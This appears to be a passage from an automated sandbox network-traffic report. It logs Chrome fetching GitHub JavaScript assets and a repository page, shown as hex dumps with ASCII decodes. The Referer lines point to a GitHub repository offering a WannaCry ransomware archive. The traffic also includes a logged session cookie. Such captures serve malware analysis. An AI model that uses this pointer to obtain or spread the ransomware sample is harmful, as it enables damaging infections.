                                                                                      Data Ascii: s-navigation-container-no-mouse)",{subscribe:e=>(0,o.qC)((0,o.RB)(e,"mouseover",j),(0,o.RB)(e,"mouseover",v))});let h=0;function y(e){if(e.target!==document.body&&e.target instanceof HTMLElement&&!e.target.classList.contains("js-navigation-enable"))return
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 61 73 65 22 41 72 72 6f 77 44 6f 77 6e 22 3a 5f 28 6f 2c 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 45 6e 74 65 72 22 3a 63 61 73 65 60 24 7b 67 7d 2b 45 6e 74 65 72 60 3a 43 28 6f 2c 65 2e 64 65 74 61 69 6c 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 5b 64 5d 29 7d 7d 65 6c 73 65 7b 69 66 28 66 29 73 77 69 74 63 68 28 28 30 2c 72 2e 45 4c 29 28 65 2e 64 65 74 61 69 6c 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 29 29 7b 63 61 73 65 22 43 6f 6e 74 72 6f 6c 2b 6e 22 3a 5f 28 6f 2c 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 43 6f 6e 74 72 6f 6c 2b 70 22 3a 41 28 6f 2c 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 41 6c 74 2b 76 22 3a 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 2c 6f 3b 6c 65 74 20 61 3d 48 28 74 29 2c 72 3d 61 2e 69 6e 64 65 78 4f 66
                                                                                      Data Ascii: ase"ArrowDown":_(o,t);break;case"Enter":case`${g}+Enter`:C(o,e.detail.originalEvent[d])}}else{if(f)switch((0,r.EL)(e.detail.originalEvent)){case"Control+n":_(o,t);break;case"Control+p":A(o,t);break;case"Alt+v":(function(e,t){let n,o;let a=H(t),r=a.indexOf


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      78192.168.2.1649783185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC742OUTGET /assets/chunk-app_assets_modules_github_onfocus_ts-app_assets_modules_github_visible_ts-app_components_sear-d461c8-a5ca34673a12.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 71844
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 12 Mar 2024 16:25:46 GMT
                                                                                      ETag: 0x8DC42B11260A3D1
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 75176
                                                                                      X-Served-By: cache-iad-kjyo7100171-IAD, cache-ewr18126-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 37, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 13dc0293997ca73c06cac924378fa7de623a6b96
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6f 6e 66 6f 63 75 73 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 76 69 73 69 62 6c 65 5f 74 73 2d 61 70 70 5f 63 6f 6d 70 6f 6e 65 6e 74 73 5f 73 65 61 72 2d 64 34 36 31 63 38 22 2c 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 73 6f 66 74 2d 6e 61 76 69 67 61 74 65 5f 73 6f 66 74 2d 6e 61 76 69 67 61 74 65 5f 74 73 22 5d 2c 7b 31 37 34 3a 28 65 2c 74 2c 69 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 6c 65 74
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_onfocus_ts-app_assets_modules_github_visible_ts-app_components_sear-d461c8","ui_packages_soft-navigate_soft-navigate_ts"],{174:(e,t,i)=>{function r(e){let
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 61 70 2c 24 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 57 3d 63 6c 61 73 73 20 52 65 70 6f 73 50 72 6f 76 69 64 65 72 42 61 73 65 20 65 78 74 65 6e 64 73 20 45 76 65 6e 74 54 61 72 67 65 74 7b 61 73 79 6e 63 20 67 65 74 4d 61 74 63 68 69 6e 67 52 65 70 6f 73 69 74 6f 72 69 65 73 28 7b 73 74 61 74 65 3a 65 7d 29 7b 6c 65 74 20 74 3d 22 22 2c 69 3d 5b 5d 3b 69 66 28 65 2e 61 73 74 29 7b 6c 65 74 20 72 3d 28 30 2c 77 2e 6f 38 29 28 65 2e 61 73 74 29 2c 6e 3d 21 31 3b 66 6f 72 28 6c 65 74 20 65 20 6f 66 20 72 29 22 72 65 70 6f 22 3d 3d 3d 65 2e 6b 69 6e 64 7c 7c 22 73 61 76 65 64 22 3d 3d 3d 65 2e 6b 69 6e 64 3f 6e 3d 21 30 3a 22 6f 72 67 22 3d 3d 3d 65 2e 6b 69 6e 64 26 26 69 2e 70 75 73 68 28 65 2e 76 61 6c 75 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65
                                                                                      Data Ascii: ap,$=new WeakMap;let W=class ReposProviderBase extends EventTarget{async getMatchingRepositories({state:e}){let t="",i=[];if(e.ast){let r=(0,w.o8)(e.ast),n=!1;for(let e of r)"repo"===e.kind||"saved"===e.kind?n=!0:"org"===e.kind&&i.push(e.value.toLowerCase
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 68 69 73 2c 65 4c 2c 7b 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 29 2c 65 54 28 74 68 69 73 2c 65 6b 2c 7b 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 29 2c 74 68 69 73 2e 71 75 65 72 79 42 75 69 6c 64 65 72 3d 65 2c 74 68 69 73 2e 70 72 69 6f 72 69 74 79 3d 39 2c 74 68 69 73 2e 6e 61 6d 65 3d 22 43 6f 64 65 22 2c 74 68 69 73 2e 73 69 6e 67 75 6c 61 72 49 74 65 6d 4e 61 6d 65 3d 22 63 6f 64 65 22 2c 74 68 69 73 2e 76 61 6c 75 65 3d 22 63 6f 64 65 22 2c 74 68 69 73 2e 74 79 70 65 3d 22 73 65 61 72 63 68 22 2c 74 68 69 73 2e 6d 61 6e 75 61 6c 6c 79 44 65 74 65 72 6d 69 6e 65 46 69 6c 74 65 72 45 6c 69 67 69 62 69 6c 69 74 79 3d 21 30 2c 65 43 28 74 68 69 73 2c 65 4c 2c 7b 7d 29 2c 74 68 69 73
                                                                                      Data Ascii: his,eL,{writable:!0,value:void 0}),eT(this,ek,{writable:!0,value:void 0}),this.queryBuilder=e,this.priority=9,this.name="Code",this.singularItemName="code",this.value="code",this.type="search",this.manuallyDetermineFilterEligibility=!0,eC(this,eL,{}),this
                                                                                      2024-03-23 14:47:26 UTC16384INData Raw: 3f 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 69 6e 70 75 74 2d 70 61 72 73 65 64 2d 73 79 6d 62 6f 6c 22 29 3a 69 2e 73 74 79 6c 65 3d 3d 3d 6b 2e 74 6a 2e 43 6f 6e 73 74 61 6e 74 3f 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 70 6c 2d 63 31 22 29 3a 69 2e 73 74 79 6c 65 3d 3d 3d 6b 2e 74 6a 2e 45 6e 74 69 74 79 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 70 6c 2d 65 6e 22 29 2c 74 2e 70 75 73 68 28 65 29 7d 74 68 69 73 2e 69 6e 70 75 74 42 75 74 74 6f 6e 54 65 78 74 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 72 65 6e 28 2e 2e 2e 74 29 7d 7d 7d 73 65 74 42 75 74 74 6f 6e 54 65 78 74 28 65 29 7b 69 66 28 65 31 28 74 68 69 73 2c 73 29 26 26 22 22 21 3d 3d 65 2e 74 72 69 6d 28 29 29 74 68 69 73 2e 69 6e 70 75 74 42 75 74 74 6f 6e 54
                                                                                      Data Ascii: ?e.classList.add("input-parsed-symbol"):i.style===k.tj.Constant?e.classList.add("pl-c1"):i.style===k.tj.Entity&&e.classList.add("pl-en"),t.push(e)}this.inputButtonText.replaceChildren(...t)}}}setButtonText(e){if(e1(this,s)&&""!==e.trim())this.inputButtonT
                                                                                      2024-03-23 14:47:26 UTC6308INData Raw: 72 61 77 51 75 65 72 79 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 2c 69 29 7b 73 75 70 65 72 28 22 71 75 65 72 79 22 29 2c 74 68 69 73 2e 70 61 72 73 65 64 51 75 65 72 79 3d 65 2c 74 68 69 73 2e 72 61 77 51 75 65 72 79 3d 74 2c 74 68 69 73 2e 70 61 72 73 65 64 4d 65 74 61 64 61 74 61 3d 69 7d 7d 7d 2c 38 32 32 36 36 3a 28 65 2c 74 2c 69 29 3d 3e 7b 69 2e 64 28 74 2c 7b 24 67 3a 28 29 3d 3e 53 6f 66 74 4e 61 76 53 75 63 63 65 73 73 45 76 65 6e 74 2c 4f 56 3a 28 29 3d 3e 53 6f 66 74 4e 61 76 53 74 61 72 74 45 76 65 6e 74 2c 51 57 3a 28 29 3d 3e 53 6f 66 74 4e 61 76 45 72 72 6f 72 45 76 65 6e 74 2c 58 72 3a 28 29 3d 3e 53 6f 66 74 4e 61 76 45 6e 64 45 76 65 6e 74 7d 29 3b 76 61 72 20 72 3d 69 28 39 30 38 30 34 29 3b 6c 65 74 20 6e 3d 63 6c 61 73 73 20
                                                                                      Data Ascii: rawQuery}constructor(e,t,i){super("query"),this.parsedQuery=e,this.rawQuery=t,this.parsedMetadata=i}}},82266:(e,t,i)=>{i.d(t,{$g:()=>SoftNavSuccessEvent,OV:()=>SoftNavStartEvent,QW:()=>SoftNavErrorEvent,Xr:()=>SoftNavEndEvent});var r=i(90804);let n=class


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      79192.168.2.1649784185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC702OUTGET /assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 9314
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:09 GMT
                                                                                      ETag: 0x8DC33C6BFA558C8
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2069263
                                                                                      X-Served-By: cache-iad-kcgs7200048-IAD, cache-ewr18169-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1041, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 0f1c06d1277a773454156b6a29cbb02865a99bab
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 6f 6b 69 65 2d 63 6f 6e 73 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 63 6f 6f 6b 69 65 2d 63 6f 6e 73 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 74 73 22 5d 2c 7b 36 32 36 33 32 3a 28 65 2c 6f 2c 74 29 3d 3e 7b 74 2e 72 28 6f 29 2c 74 2e 64 28 6f 2c 7b 43 6f 6f 6b 69 65 43 6f 6e 73 65 6e 74 45 6c 65 6d 65 6e 74 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 72 2c 61 3d 74 28 37 36 30 30 36 29 2c 69 3d 74 28 36 33 32 37 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 6f 2c 74 2c 72 29 7b 76 61 72 20 61 2c 69 3d 61
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_cookie-consent-element_cookie-consent-element_ts"],{62632:(e,o,t)=>{t.r(o),t.d(o,{CookieConsentElement:()=>s});var r,a=t(76006),i=t(63276);function n(e,o,t,r){var a,i=a
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 61 6c 79 74 69 63 73 3d 22 41 6e 61 6c 79 74 69 63 73 22 2c 65 2e 53 6f 63 69 61 6c 4d 65 64 69 61 3d 22 53 6f 63 69 61 6c 4d 65 64 69 61 22 2c 65 2e 41 64 76 65 72 74 69 73 69 6e 67 3d 22 41 64 76 65 72 74 69 73 69 6e 67 22 7d 28 72 7c 7c 28 72 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 71 75 69 72 65 64 3d 22 52 65 71 75 69 72 65 64 22 2c 65 2e 41 6e 61 6c 79 74 69 63 73 3d 22 41 6e 61 6c 79 74 69 63 73 22 2c 65 2e 53 6f 63 69 61 6c 4d 65 64 69 61 3d 22 53 6f 63 69 61 6c 20 4d 65 64 69 61 22 2c 65 2e 41 64 76 65 72 74 69 73 69 6e 67 3d 22 41 64 76 65 72 74 69 73 69 6e 67 22 7d 28 61 7c 7c 28 61 3d 7b 7d 29 29 3b 6c 65 74 20 73 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 73 69 74 65 2d 70 6f 6c 69
                                                                                      Data Ascii: alytics="Analytics",e.SocialMedia="SocialMedia",e.Advertising="Advertising"}(r||(r={})),function(e){e.Required="Required",e.Analytics="Analytics",e.SocialMedia="Social Media",e.Advertising="Advertising"}(a||(a={}));let s="https://docs.github.com/site-poli
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 20 61 64 73 20 61 6e 64 20 63 6f 6e 74 65 6e 74 20 79 6f 75 20 73 65 65 20 6f 6e 20 6f 75 72 20 77 65 62 73 69 74 65 73 20 61 6e 64 20 6f 6e 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 77 69 6c 6c 20 62 65 74 74 65 72 20 72 65 66 6c 65 63 74 20 79 6f 75 72 20 69 6e 74 65 72 65 73 74 73 2e 20 54 68 69 73 20 61 6c 73 6f 20 65 6e 61 62 6c 65 73 20 74 68 69 72 64 20 70 61 72 74 69 65 73 20 74 6f 20 64 65 76 65 6c 6f 70 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 74 68 65 69 72 20 70 72 6f 64 75 63 74 73 2c 20 77 68 69 63 68 20 74 68 65 79 20 6d 61 79 20 75 73 65 20 6f 6e 20 77 65 62 73 69 74 65 73 20 74 68 61 74 20 61 72 65 20 6e 6f 74 20 6f 77 6e 65 64 20 6f 72 20 6f 70 65 72 61 74 65 64 20 62 79 20 47 69 74 48 75 62 2e 22 7d 2c 7b 69 64 3a 22 41 64 76 65 72 74 69
                                                                                      Data Ascii: ads and content you see on our websites and on social media will better reflect your interests. This also enables third parties to develop and improve their products, which they may use on websites that are not owned or operated by GitHub."},{id:"Adverti
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 70 65 72 73 6f 6e 61 6c 2d 61 63 63 6f 75 6e 74 2d 73 65 74 74 69 6e 67 73 2f 6d 61 6e 61 67 69 6e 67 2d 79 6f 75 72 2d 63 6f 6f 6b 69 65 2d 70 72 65 66 65 72 65 6e 63 65 73 2d 66 6f 72 2d 67 69 74 68 75 62 73 2d 65 6e 74 65 72 70 72 69 73 65 2d 6d 61 72 6b 65 74 69 6e 67 2d 70 61 67 65 73 22 3e 48 6f 77 20 74 6f 20 6d 61 6e 61 67 65 20 63 6f 6f 6b 69 65 20 70 72 65 66 65 72 65 6e 63 65 73 3c 2f 61 3e 20 7c 20 3c 61 20 68 72 65 66 3d 22 24 7b 73 7d 22 3e 50 72 69 76 61 63 79 20 53 74 61 74 65 6d 65 6e 74 3c 2f 61 3e 20 7c 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 73 69 74 65 2d 70 6f 6c 69 63 79 2f 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 69 65 73 2f 67 69 74 68 75 62 2d 73 75 62 70 72 6f 63 65 73
                                                                                      Data Ascii: personal-account-settings/managing-your-cookie-preferences-for-githubs-enterprise-marketing-pages">How to manage cookie preferences</a> | <a href="${s}">Privacy Statement</a> | <a href="https://docs.github.com/site-policy/privacy-policies/github-subproces
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 29 22 2c 22 70 72 69 6d 61 72 79 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 77 68 69 74 65 29 22 2c 22 74 65 78 74 2d 63 6f 6c 6f 72 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 77 68 69 74 65 29 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 38 29 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 67 72 61 79 2d 37 29 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 62 6f 72 64 65 72 22 3a 22 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 63 6f 6c 6f
                                                                                      Data Ascii: )","primary-button-color":"var(--color-scale-white)","text-color":"var(--color-scale-white)","secondary-button-color":"var(--color-scale-gray-8)","secondary-button-disabled-color":"var(--color-scale-gray-7)","secondary-button-border":"1px solid var(--colo
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 69 74 65 29 22 2c 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 3a 22 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 63 61 6c 65 2d 77 68 69 74 65 29 22 2c 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 3a 22 72 67 62 61 28 32 32 37 2c 20 32 32 37 2c 20 32 32 37 2c 20 30 2e 32 29 22 2c 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 22 3a 22 72 67 62 61 28 32 32 37 2c 20 32 32 37 2c 20 32 32 37 2c 20 30 2e 32 29 22 7d 7d 2c 69 6e 69 74 69 61 6c 54 68 65 6d 65 3a 22 67 69 74 68 75 62 22 7d 2c 75 3d 7b 52 65 71 75 69 72 65 64 3a 7b 52 65 71 75 69 72 65 64 3a 21 30 2c 41 6e 61 6c 79 74 69 63 73 3a 21 31 2c
                                                                                      Data Ascii: ite)","radio-button-hover-background-color":"var(--color-scale-white)","radio-button-disabled-color":"rgba(227, 227, 227, 0.2)","radio-button-disabled-border-color":"rgba(227, 227, 227, 0.2)"}},initialTheme:"github"},u={Required:{Required:!0,Analytics:!1,
                                                                                      2024-03-23 14:47:26 UTC1046INData Raw: 70 6c 69 74 28 22 3d 22 29 3b 65 3d 3d 3d 72 26 26 76 6f 69 64 20 30 21 3d 3d 61 26 26 6f 2e 70 75 73 68 28 7b 6b 65 79 3a 72 2c 76 61 6c 75 65 3a 61 7d 29 7d 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 6f 2c 74 3d 6e 75 6c 6c 2c 72 3d 21 31 2c 61 3d 22 6c 61 78 22 29 7b 6c 65 74 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 69 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 64 6f 63 75 6d 65 6e 74 20 64 6f 6d 61 69 6e 22 29 3b 69 2e 65 6e 64 73 57 69 74 68 28 22 2e 67 69 74 68 75 62 2e 63 6f 6d 22 29 26 26 28 69 3d 22 67 69 74 68 75 62 2e 63 6f 6d 22 29 3b 6c 65 74 20 6e 3d 22 68 74 74 70 73 3a 22 3d 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 3f
                                                                                      Data Ascii: plit("=");e===r&&void 0!==a&&o.push({key:r,value:a})}return o}function i(e,o,t=null,r=!1,a="lax"){let i=document.domain;if(null==i)throw Error("Unable to get document domain");i.endsWith(".github.com")&&(i="github.com");let n="https:"===location.protocol?


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      80192.168.2.1649785140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC1147OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0 HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: text/html, application/xhtml+xml
                                                                                      Turbo-Frame: repo-content-turbo-frame
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:27 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"a21c62f5fa5d1b61c20b6b6f7df0c2d6"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:27 UTC3021INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
